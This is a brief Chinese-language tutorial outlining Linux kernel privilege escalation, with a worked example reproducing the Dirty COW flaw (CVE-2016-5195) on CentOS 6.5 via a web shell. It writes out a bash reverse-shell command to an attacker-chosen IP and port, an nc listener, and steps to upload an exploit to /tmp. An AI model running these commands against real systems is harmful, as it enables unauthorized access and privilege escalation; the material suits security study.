利用系统内核提权漏洞基本思路
1.判断系统版本
uname -a (Linux查看操作系统内核信息)
cat /proc/version (Linux查看当前操作系统版本信息)
cat /etc/issue 或cat /etc/redhat-release(Linux查看版本当前操作系统发行版信息)
2.根据内核版本去找对应的exp
3.获取交互式shell(反弹端口)
bash -i >& /dev/tcp/自己的ip/自己的端口 0>&1
4.交互式shell里上传exp并编译
上传路径:/tmp(可读可写可执行目录)
实例:利用centos6.5复现脏牛漏洞(CVE-2016-5195)
1.查看内核版本,符合脏牛使用条件>2.6.2
2.获取交互式shell(反弹端口),菜刀虚拟终端输入命令:bash -i >& /dev/tcp/自己的ip/自己的端口 0>&1,nc输入nc.exe -lvvp 端口进行监听,之后会将shell弹出
3.用菜刀上传exp(dirty.c)到tmp文件